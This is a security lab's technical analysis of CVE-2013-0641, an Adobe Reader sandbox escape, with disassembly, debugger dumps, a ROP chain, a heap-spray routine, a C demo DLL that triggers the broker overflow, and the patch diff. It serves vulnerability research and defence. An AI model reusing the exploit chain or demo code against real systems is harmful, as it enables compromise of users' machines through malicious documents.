CVE-2013-0641, analysis of Acrobat Reader sandbox escape(en)

On 2013年02月22日, in 安全分析, by code_audit_labs

The vulnerability is caused by the sandbox's LPC channel: when a call is dispatched to a W-series (wide-character) function, the buffer size and the count argument are not kept consistent.

by instruder and binjo of code audit labs of vulnhunt.com

translate by xiaomin of code audit labs of vulnhunt.com

Since Acrobat Reader introduced its sandbox, successful attacks against it have fallen sharply, which shows that the sandbox raises the difficulty of an attack. That does not mean it cannot be attacked: the recent campaign, which spread PDF attachments through spear-phishing e-mail, uses two vulnerabilities. First an XFA vulnerability with ROP shellcode is used to load a malicious DLL; then a sandbox vulnerability is used to execute the final malicious code in the broker process.

The entire escape takes place in the D.T DLL, which the shellcode loads into the sandboxed process after triggering the XFA vulnerability:

  1. Register a clipboard format with RegisterClipboardFormatW, using a name built from 0x80 dwords whose value is all 0x8080020.
  2. Trigger the broker process into allocating a 0xC800000-byte block, lay out the ROP shellcode in it, and at the same time occupy the memory around address 0x8080020.
  3. D.T constructs and sends an LPC buffer for GetClipboardFormatNameA, but changes the invoke tag in the LPC buffer to 0x73, the invoke tag of GetClipboardFormatNameW; the broker process therefore calls GetClipboardFormatNameW to fetch the format name. The buffer prepared for the call is 0x9c bytes filled with 0x42 and sized for single-byte characters, but the wide-character call copies 0x9c*2 bytes, overwriting the function pointers that follow the buffer.
  4. D.T then constructs and sends a call with tag id 0xb0; control of EIP is finally gained at AcroRd32+0x9afda in AcroRd32.exe, which jumps to address 0x808002c to execute the shellcode, and the shellcode loads the L2P.T DLL to complete the attack.

Register clipboard format

D.T registers a new clipboard format with user32!RegisterClipboardFormatW; the format name is 0x80 dwords of 0x08080020 (this address is the pointer value used when the vulnerable function is triggered).

.text:10001D74 sub esp, 208h

.text:10001D7A xor eax, eax

.text:10001D7C

.text:10001D7C loc_10001D7C: ; CODE XREF:   register_clipfmt+1Cj

.text:10001D7C mov dword ptr [ebp+eax*4+szFormat],   8080020h

.text:10001D87 inc eax

.text:10001D88 cmp eax, 80h

.text:10001D8D jb short loc_10001D7C

…………………………………………………………………………………………………………………………

.text:10001E12

.text:10001E12 loc_10001E12: ; CODE XREF:   register_clipfmt+2Bj

.text:10001E12 lea eax, [ebp+szFormat]

.text:10001E18 push eax ; lpszFormat

.text:10001E19 call RegisterClipboardFormatW

This is where the wide-character buffer is filled.

Rop shellcode

The ROP shellcode uses gadgets (pointers) from clbcatq.dll.

.text:10002B4D

.text:10002B4D pBuffer = byte ptr -400h ; shellcode   built within

.text:10002B4D var_380 = byte ptr -380h

.text:10002B4D arg_0 = dword ptr 8

.text:10002B4D

.text:10002B4D push ebp

.text:10002B4E mov ebp, esp

.text:10002B50 sub esp, 400h

.text:10002B56 push ebx

.text:10002B57 push esi

.text:10002B58 push edi

.text:10002B59 mov ebx, [ebp+arg_0]

.text:10002B5C push offset g_pszModName ; %temp%L2P.T

.text:10002B61 lea eax, [ebp+pBuffer] ; shellcode built   within

.text:10002B67 push eax

.text:10002B68 call build_rop_shellcode

ROP chain

0:007> dds ebp-400

1d44f3d4 41414141

1d44f3d8 41414141

1d44f3dc 41414141

1d44f3e0 41414141

1d44f3e4 41414141

1d44f3e8 41414141

1d44f3ec 41414141

1d44f3f0 41414141

1d44f3f4 760214eb CLBCatQ+0x14eb

1d44f3f8 760214eb CLBCatQ+0x14eb

1d44f3fc 76024527 CLBCatQ!GetCatalogObject2+0xe71

1d44f400 76051566   CLBCatQ!OpenComponentLibraryOnMemEx+0x22e9

1d44f404 760214eb CLBCatQ+0x14eb

1d44f408 760214eb CLBCatQ+0x14eb

1d44f40c 760214eb CLBCatQ+0x14eb

1d44f410 7647ef42 kernel32!LoadLibraryW

1d44f414 760214eb CLBCatQ+0x14eb

1d44f418 08080054

1d44f41c 7647c266 kernel32!Sleep

1d44f420 760214eb CLBCatQ+0x14eb

1d44f424 0036ee80

1d44f428 003a0043

1d44f42c 0055005c

1d44f430 00650073

1d44f434 00730072

1d44f438 0077005c

1d44f43c 006e0069

1d44f440 005c0037

1d44f444 00700041

1d44f448 00440070

1d44f44c 00740061

1d44f450 005c0061

0:007> du 1d44f428

1d44f428 "C:\Users\win7\AppData\Local\Temp"

1d44f468 "\acrord32_sbx\L2P.T"

Arranging the memory layout of the broker process

After the ROP shellcode is composed, it is sprayed into shared memory of size 0xc800000, so that address 0x08080020 is filled.

/*
 * Decompiler (Hex-Rays) rendering of the routine that prepares the ROP
 * payload and copies it into the shared-memory region the broker later reads.
 *
 * a1      -- size in bytes of the region to fill; in the traced run this is
 *            0xC800000 (see the LPC buffer dump and the broker's
 *            new(0xc800000) call above).
 * returns -- the region pointer obtained from sub_10003840(a1); who owns or
 *            frees that region is not visible here.
 *
 * Defender's view: the observable side effects are a very large broker-side
 * allocation whose size is supplied over IPC, followed by the region being
 * filled with a repeating 0x400-byte pattern. Bounding IPC-supplied sizes on
 * the broker side would blunt this spray primitive.
 */
void *__stdcall build_rop_buffer(int a1)
{
void *v1; // esi@1
void *i; // edi@1
char pBuffer; // [sp+Ch] [bp-400h]@1 -- decompiler artifact: start of the 0x400-byte stack buffer (pBuffer = byte ptr -400h in the listing), not a single char
char v5; // [sp+8Ch] [bp-380h]@1 -- start of the sub-range 0x80 bytes into that same buffer (var_380)
/* Build the 0x400-byte ROP stage into the stack buffer; g_pszModName is
   presumably the path of the module the chain loads (the listing annotates
   it as %temp%L2P.T). */
build_rop_shellcode(&pBuffer, &g_pszModName);
/* Obtain the destination region of a1 bytes (helper not shown). */
v1 = (void *)sub_10003840(a1);
/* The first 0x3E0 (992) bytes come from the sub-range starting at v5.
   NOTE(review): 0x3E0 bytes from bp-380h extends past bp, so this copy reads
   beyond the local buffer -- confirm against the disassembly. */
fill_sharemem(v1, &v5, 0x3E0u);
/* Then tile the rest of the region with 0x400-byte copies of the full
   buffer, starting at offset 992 and stopping before a chunk would cross
   v1 + a1. */
for ( i = (char *)v1 + 992; (char *)i + 1024 < (char   *)v1 + a1; i = (char *)i + 1024 )
fill_sharemem(i, &pBuffer, 0x400u);
return v1;
}

The sandboxed process issues a call with tag 0x5D (HttpSendRequestA); the broker process validates the call and reads the corresponding content.

// sandbox process

0:007> bl

0 d 64461049 0001 (0001) 0:**** AcroForm+0x1049

1 e 649aa9be 0001 (0001) 0:****   AcroForm!DllUnregisterServer+0x3a639e

2 e 02942259 0001 (0001) 0:**** D+0x2259

3 e 02941c23 0001 (0001) 0:**** D+0x1c23

0:007> g

Breakpoint 3 hit

eax=0296d43c ebx=0000c161 ecx=00000000 edx=00000010   esi=00cc0018 edi=00000000

eip=02941c23 esp=1d44f780 ebp=1d44f7cc iopl=0 nv up ei   pl nz ac po nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000   efl=00000212

D+0x1c23:

02941c23 push offset D!initOLEcontainer+0x2b0b0   (0296d43c)

0:007> u

D+0x1c23:

02941c23 push offset D!initOLEcontainer+0x2b0b0   (0296d43c)

02941c28 call D+0x18a3 (029418a3) // lpc call

0:007> dd 0296d43c
0296d43c 0000005d 00000000 00000000 00000000
0296d44c 00000000 00000000 00000000 00000000
0296d45c 00000000 00000000 00000000 00000000
0296d46c 00000000 00000000 00000000 00000003
0296d47c 00000004 00000070 00000004 00000005
0296d48c 00000074 00000000 00000008 00000074
0296d49c 0000000c ffffffff 00000080 ffffffff
0296d4ac 00cc0020 000005f0 1daf0028 0c800000

0:007> db 1daf0028

1daf0028 4c 00 6f 00 63 00 61 00-6c 00 5c 00 54 00 65   00 L.o.c.a.l.\.T.e.

1daf0038 6d 00 70 00 5c 00 61 00-63 00 72 00 6f 00 72   00 m.p.\.a.c.r.o.r.

1daf0048 64 00 33 00 32 00 5f 00-73 00 62 00 78 00 5c   00 d.3.2._.s.b.x.\.

1daf0058 4c 00 32 00 50 00 2e 00-54 00 00 00 66 66 66   66 L.2.P...T...ffff

1daf0068 66 66 66 66 66 66 66 66-66 66 66 66 66 66 66   66 ffffffffffffffff

1daf0078 66 66 66 66 66 66 66 66-66 66 66 66 66 66 66   66 ffffffffffffffff

1daf0088 66 66 66 66 66 66 66 66-66 66 66 66 66 66 66   66 ffffffffffffffff

1daf0098 66 66 66 66 66 66 66 66-66 66 66 66 66 66 66   66 ffffffffffffffff

// broker process

0:012> bl

0 e 012ea515 0001 (0001) 0:**** AcroRd32+0x9a515

1 e 012e1ae0 0001 (0001) 0:**** AcroRd32+0x91ae0

0:012> g

Breakpoint 1 hit

eax=00cc0020 ebx=00000000 ecx=013a4940 edx=022d2960   esi=013a4940 edi=0000005d

eip=012e1ae0 esp=032ffb14 ebp=032ffb34 iopl=0 nv up ei   ng nz ac pe cy

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000   efl=00000297

AcroRd32+0x91ae0:

012e1ae0 push ebp

0:012>

eax=013fa6f4 ebx=02314838 ecx=000005f0 edx=00000001   esi=00000000 edi=0c800000

eip=012c82ab esp=032ffacc ebp=032ffae0 iopl=0 nv up ei   ng nz na pe cy

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000   efl=00000287

AcroRd32+0x782ab:

012c82ab push edi

0:012>

eax=013fa6f4 ebx=02314838 ecx=000005f0 edx=00000001   esi=00000000 edi=0c800000

eip=012c82ac esp=032ffac8 ebp=032ffae0 iopl=0 nv up ei   ng nz na pe cy

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000   efl=00000287

AcroRd32+0x782ac:

012c82ac call AcroRd32+0x282c1 (012782c1) //   new(0xc800000)

0:012>

eax=07ab0020 ebx=02314838 ecx=012782f0 edx=07ab0000   esi=00000000 edi=0c800000

eip=012c82b1 esp=032ffac8 ebp=032ffae0 iopl=0 nv up ei   pl nz na po nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000   efl=00000202

AcroRd32+0x782b1:

012c82b1 mov esi,eax

…………………………………..

0:012> d 07ab0020

07ab0020 00000000 00000000 00000000 00000000

07ab0030 00000000 00000000 00000000 00000000

07ab0040 00000000 00000000 00000000 00000000

07ab0050 00000000 00000000 00000000 00000000

07ab0060 00000000 00000000 00000000 00000000

07ab0070 00000000 00000000 00000000 00000000

07ab0080 00000000 00000000 00000000 00000000

07ab0090 00000000 00000000 00000000 00000000

0:012> p

eax=032ffba0 ebx=02314838 ecx=013fa6f4 edx=000001b4   esi=07ab0020 edi=0c800000

eip=012c82d4 esp=032ffabc ebp=032ffae0 iopl=0 nv up ei   pl nz na po nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000   efl=00000202

AcroRd32+0x782d4:

*** ERROR: Symbol file could not be found. Defaulted to   export symbols for C:\Windows\system32\kernel32.dll -

012c82d4 call dword ptr [AcroRd32+0xe53b0 (013353b0)]   ds:0023:013353b0={kernel32!ReadProcessMemory (7646c7e3)}

0:012> p

eax=00000001 ebx=02314838 ecx=032ffadc edx=0c800000   esi=07ab0020 edi=0c800000

eip=012c82da esp=032ffad0 ebp=032ffae0 iopl=0 nv up ei   pl nz na po nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000   efl=00000202

AcroRd32+0x782da:

012c82da test eax,eax

0:012> d 07ab0020

07ab0020 006f004c 00610063 005c006c 00650054

07ab0030 0070006d 0061005c 00720063 0072006f

07ab0040 00330064 005f0032 00620073 005c0078

07ab0050 0032004c 002e0050 00000054 66666666

07ab0060 66666666 66666666 66666666 66666666

07ab0070 66666666 66666666 66666666 66666666

07ab0080 66666666 66666666 66666666 66666666

07ab0090 66666666 66666666 66666666 66666666

0:012> d 08080020

08080020 760214eb 760214eb 76024527 76051566

08080030 760214eb 760214eb 760214eb 7647ef42

08080040 760214eb 08080054 7647c266 760214eb

08080050 0036ee80 003a0043 0055005c 00650073

08080060 00730072 0077005c 006e0069 005c0037

08080070 00700041 00440070 00740061 005c0061

08080080 006f004c 00610063 005c006c 00650054

08080090 0070006d 0061005c 00720063 0072006f

overflow vulnerability trigger

After D.T has arranged the broker process memory layout, it begins to construct the LPC buffer for the GetClipboardFormatNameA call, in function sub_10001E23.

.text:100022BE push 9Ch ; size for trigger

.text:100022C3 push ebx ; handle of registered   clipboard format name

.text:100022C4 call sub_10001E23

// sandbox process

0:007> bl

0 d 64461049 0001 (0001) 0:**** AcroForm+0x1049

1 e 649aa9be 0001 (0001) 0:****   AcroForm!DllUnregisterServer+0x3a639e

2 e 02942259 0001 (0001) 0:**** D+0x2259

3 e 02941c23 0001 (0001) 0:**** D+0x1c23

4 e 02941ea5 0001 (0001) 0:**** D+0x1ea5

0:007> g

Breakpoint 4 hit

eax=0296d43c ebx=0000c161 ecx=00000000 edx=000000a0   esi=0000c161 edi=0000009c

eip=02941ea5 esp=1d44f5bc ebp=1d44f7d0 iopl=0 nv up ei   pl nz na pe nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000   efl=00000206

D+0x1ea5:

02941ea5 push offset D!initOLEcontainer+0x2b0b0   (0296d43c)

0:007> u

D+0x1ea5:

02941ea5 push offset D!initOLEcontainer+0x2b0b0   (0296d43c)

02941eaa call D+0x18a3 (029418a3) // lpc call

02941eaf call D+0x1978 (02941978)

02941eb4 call D+0x1000 (02941000)

02941eb9 pop edi

02941eba pop esi

02941ebb mov esp,ebp

02941ebd pop ebp

0:007> dd 0296d43c —> IPC buffer
0296d43c 00000073 00000000 00000000 00000000 // tag id
0296d44c 00000000 00000000 00000000 00000000
0296d45c 00000000 00000000 00000000 00000000
0296d46c 00000000 00000000 00000000 00000002 // params_count
0296d47c 00000006 00000064 0000009c 00000002
0296d48c 00000100 00000004 ffffffff 00000104
0296d49c ffffffff 42424242 42424242 42424242
0296d4ac 42424242 42424242 42424242 42424242

structure

parameter structure

(ref BH_US_11_SabanalYason_Readerx_WP.pdf)

The tag id for the GetClipboardFormatNameA API is 0x74, but it is maliciously changed to 0x73. The broker process does not check this: from the broker's point of view it cannot tell whether the parameters were meant for the ANSI or the Unicode variant. After checking that the parameters and sizes are consistent, it calls the function selected by the tag -- here GetClipboardFormatNameW.

.text:0049A512 mov eax, [ebp+arg_4]

.text:0049A515 mov ecx, [eax]

.text:0049A517 mov eax, [eax+4]

.text:0049A51A push ebx

.text:0049A51B push esi

.text:0049A51C push ecx ; cchMaxCount

.text:0049A51D push eax ; lpszFormatName

.text:0049A51E mov eax, [ebp+format]

.text:0049A521 push eax ; format

.text:0049A522 xor bl, bl

.text:0049A524 call ds:GetClipboardFormatNameW

.text:0049A52A mov esi, eax

.text:0049A52C test esi, esi

.text:0049A52E jnz short loc_49A54C

The initial buffer is 0x9c bytes and the cchMaxCount passed in is 0x9c, but the amount of data user32!GetClipboardFormatNameW actually copies is 0x9c*2 bytes, which overwrites key pointers in the memory that follows the buffer.

// broker process
0:003> bp AcroRd32+0x9a515
0:003> g
ModLoad: 73390000 7339d000 C:\Windows\system32\dhcpcsvc6.DLL
ModLoad: 75200000 75212000 C:\Windows\system32\dhcpcsvc.DLL
ModLoad: 73da0000 73db6000 C:\Windows\system32\MAPI32.DLL
Breakpoint 0 hit
eax=04544720 ebx=00000000 ecx=013a34c8 edx=04544720 esi=013a34c8 edi=0316f80c
eip=012ea515 esp=01aff8f4 ebp=01aff8f8 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
AcroRd32+0x9a515:
012ea515 mov ecx,dword ptr [eax] ds:0023:04544720=0000009c
0:003> dd eax l2
04544720 0000009c 0454a5e4
0:003> db 0454a5e4 l9c+20
0454a5e4 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
0454a5f4 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
0454a604 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
0454a614 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
0454a624 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
0454a634 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
0454a644 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
0454a654 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
0454a664 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
0454a674 42 42 42 42 42 42 42 42-42 42 42 42 61 c1 00 00 BBBBBBBBBBBBa…
0454a684 00 00 00 00 00 00 00 00-00 00 00 00 05 91 ce 0b …………….
0454a694 00 00 00 94 50 9b 35 01-00 00 da 73 ….P.5….s

// overflow after calling GetClipboardFormatNameW

0:003> db 0454a5e4 l9c+20
0454a5e4 20 00 08 08 20 00 08 08-20 00 08 08 20 00 08 08 … … … …
0454a5f4 20 00 08 08 20 00 08 08-20 00 08 08 20 00 08 08 … … … …
0454a604 20 00 08 08 20 00 08 08-20 00 08 08 20 00 08 08 … … … …
0454a614 20 00 08 08 20 00 08 08-20 00 08 08 20 00 08 08 … … … …
0454a624 20 00 08 08 20 00 08 08-20 00 08 08 20 00 08 08 … … … …
0454a634 20 00 08 08 20 00 08 08-20 00 08 08 20 00 08 08 … … … …
0454a644 20 00 08 08 20 00 08 08-20 00 08 08 20 00 08 08 … … … …
0454a654 20 00 08 08 20 00 08 08-20 00 08 08 20 00 08 08 … … … …
0454a664 20 00 08 08 20 00 08 08-20 00 08 08 20 00 08 08 … … … …
0454a674 20 00 08 08 20 00 08 08-20 00 08 08 20 00 08 08 … … … …
0454a684 20 00 08 08 20 00 08 08-20 00 08 08 20 00 08 08 … … … …
0454a694 20 00 08 08 20 00 08 08-20 00 08 08 … … … // vtable pointer at 0x01359b50 overwritten

Execute shellcode

After D.T has overwritten the critical data, it calls tag id 0xb0 again, which triggers a call through the previously arranged object.

// sandbox process

0:007> bp 02942099

0:007> g

Breakpoint 4 hit

eax=0296d43c ebx=0000c161 ecx=00000000 edx=00000004   esi=000003ea edi=000003ea

eip=02942099 esp=1d44f7c4 ebp=1d44f7d4 iopl=0 nv up ei   pl nz ac pe nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000   efl=00000216

D+0x2099:

02942099 call D+0x18a3 (029418a3)

0:007> dd 0296d43c

0296d43c 000000b0 00000000 00000000 00000000

0296d44c 00000000 00000000 00000000 00000000

0296d45c 00000000 00000000 00000000 00000000

0296d46c 00000000 00000000 00000000 00000001

0296d47c 00000002 00000058 00000004 ffffffff

0296d48c 0000005c ffffffff 000003ea 00000000

0296d49c 00000000 00000000 00000000 00000000

0296d4ac 00000000 00000000 00000000 00000000

// broker process

0:013> bp acrord32+9af80

0:013> g

eax=019bfc64 ebx=0277f994 ecx=013a2144 edx=08080020   esi=013a2144 edi=0454a698

eip=012eafd3 esp=019bfc50 ebp=019bfc5c iopl=0 nv up ei   pl nz na po nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000   efl=00000202

AcroRd32+0x9afd3:

012eafd3 mov eax,dword ptr [edx+0Ch]   ds:0023:0808002c=76051566

0:002> ub

AcroRd32+0x9afc1:

012eafc1 push eax

012eafc2 lea eax,[ebp+8]

012eafc5 push eax

012eafc6 mov ecx,esi

012eafc8 call AcroRd32+0xd34b0 (013234b0)

012eafcd test edi,edi

012eafcf je AcroRd32+0x9afdc (012eafdc)

012eafd1 mov edx,dword ptr [edi] // edi points to fake   vtable, 0x08080020

0:002> u

AcroRd32+0x9afd3:

012eafd3 mov eax,dword ptr [edx+0Ch] // edx under control

012eafd6 push 1

012eafd8 mov ecx,edi

012eafda call eax // rop stackpivot

0:002> p

eax=76051566 ebx=0277f994 ecx=013a2144 edx=08080020   esi=013a2144 edi=0454a698

eip=012eafd6 esp=019bfc50 ebp=019bfc5c iopl=0 nv up ei   pl nz na po nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000   efl=00000202

AcroRd32+0x9afd6:

012eafd6 push 1

0:002>

eax=76051566 ebx=0277f994 ecx=013a2144 edx=08080020   esi=013a2144 edi=0454a698

eip=012eafd8 esp=019bfc4c ebp=019bfc5c iopl=0 nv up ei   pl nz na po nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000   efl=00000202

AcroRd32+0x9afd8:

012eafd8 mov ecx,edi

0:002>

eax=76051566 ebx=0277f994 ecx=0454a698 edx=08080020   esi=013a2144 edi=0454a698

eip=012eafda esp=019bfc4c ebp=019bfc5c iopl=0 nv up ei   pl nz na po nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000   efl=00000202

AcroRd32+0x9afda:

012eafda call eax {CLBCatQ!RegMeta::SetHandler+0x16   (76051566)}

0:002> u 76051566

*** ERROR: Symbol file could not be found. Defaulted to   export symbols for C:\Windows\system32\CLBCatQ.DLL -

CLBCatQ!OpenComponentLibraryOnMemEx+0x22e9: --------> start of the ROP chain

76051566 push edx

76051567 pop esp

76051568 pop ebp

76051569 ret 8

The broker process only checks that the parameter buffer and its stated size are consistent; it does not take into account that for W-series functions the buffer and the size are not equal but related by a factor of two. A call originally targeting an A-series function can therefore be maliciously redirected into the W-series function, which causes the vulnerability.

demo example

#include "stdafx.h"

#pragma comment(lib,"user32.lib")

/* 0x9c-byte ANSI destination buffer; pass_sandbox() also passes 0x9c as the
   character count, which is only correct for the A-series function. */
char szFA[0x9c];

/*
 * Demonstrates the root cause from inside the sandboxed process.
 *
 * A clipboard format is registered under a long wide-character name, then
 * queried with GetClipboardFormatNameA into the 0x9c-byte szFA with
 * cchMaxCount == 0x9c. The request leaves the sandbox over the broker's LPC
 * channel; the analysis above shows that when the request is dispatched to
 * the W-series handler (tag 0x73) the broker forwards the same count of 0x9c,
 * which GetClipboardFormatNameW treats as 0x9c WCHARs (0x138 bytes) -- twice
 * the destination size.
 *
 * Mitigation (broker side): derive the count handed to a W-series function
 * from the validated byte size (size / sizeof(WCHAR)) and require the tag to
 * agree with the character width the caller declared, rather than trusting
 * the tag alone.
 */
void pass_sandbox()
{
/* 0x81*2 WCHARs of 'e'/'c' filler; presumably longer than 0x9c characters so
   the lookup copies the full requested count. */
WCHAR   szFB[0x81*2]=L"eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc";
/* Captured for debugging only; never read afterwards. */
unsigned int error_code1=0;
UINT result = RegisterClipboardFormatW((LPCWSTR)szFB);
if (result==0)
{
error_code1=GetLastError();
return ;
}
/* Pre-fill the destination with 0x45 ('E'), presumably so the overwrite is
   easy to spot in a memory dump. */
memset(szFA,0x45,0x9c);
GetClipboardFormatNameA(result,szFA,0x9c);//change the tag   into  0x73 before send the lpc buffer
}

/*
 * Standard DLL entry point. The demonstration runs on DLL_PROCESS_ATTACH,
 * i.e. as soon as this module is mapped (presumably into the sandboxed
 * process); the other notification reasons do nothing.
 *
 * hModule, lpReserved -- unused.
 * Returns TRUE so the loader keeps the module mapped.
 */
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
pass_sandbox();
/* fallthrough: the remaining reasons share the single break below */
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

Patch

Adobe has released a patch. Comparing the binaries, we find that when the GetClipboardFormatNameW handler (tag 0x73) is processed, the incoming cchMaxCount parameter is now adjusted, as follows:

.text:00496432 mov ecx, [ebp+arg_4]

.text:00496435 mov eax, [ecx]

.text:00496437 mov ecx, [ecx+4]

.text:0049643A push ebx

.text:0049643B push esi

.text:0049643C shr eax, 1 ; size / 2

.text:0049643E push eax ; cchMaxCount

.text:0049643F mov eax, [ebp+format]

.text:00496442 push ecx ; lpszFormatName

.text:00496443 push eax ; format

.text:00496444 xor bl, bl

.text:00496446 call ds:GetClipboardFormatNameW

The patch seems to have a problem: a wide-character format name of 0x9c characters was originally required, but after the rigid division of the length by 2, only a wide-character format name of 0x9c/2 characters can be retrieved.

Summary

This paper only analyzes the sandbox escape vulnerability; we marvel at how well the exploit author understands the internal structure of PDF and of the sandbox.

Criticism and corrections are welcome; thank you!

How to detect

Vulnhunt's Xingyun next-generation network threat detection platform uses signature-free algorithms; registered Xingyun users can detect this attack without updating any signatures.

References

  1. http://media.blackhat.com/bh-us-11/Sabanal/BH_US_11_SabanalYason_Readerx_WP.pdf
  2. https://media.blackhat.com/bh-eu-12/Liu_Lovet/bh-eu-12-Liu_Lovet-Sandworms-Slides.pdf